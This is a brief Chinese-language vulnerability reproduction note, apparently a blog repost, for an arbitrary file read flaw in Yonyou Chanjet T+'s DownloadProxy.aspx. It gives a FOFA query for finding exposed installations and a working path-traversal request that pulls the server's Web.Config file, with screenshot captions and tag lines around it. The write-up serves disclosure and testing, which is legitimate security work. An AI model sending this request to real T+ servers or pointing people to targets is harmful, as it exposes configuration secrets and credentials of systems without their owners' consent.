用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞

1. 漏洞描述

用友 畅捷通T+ DownloadProxy.aspx文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器上的敏感文件.

2.FOFA

app="畅捷通-TPlus"

3.漏洞复现

登录页面
用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞_第1张图片
验证POC
/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config
用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞_第2张图片

你可能感兴趣的:(服务器,运维,web安全,网络安全,网络攻击模型)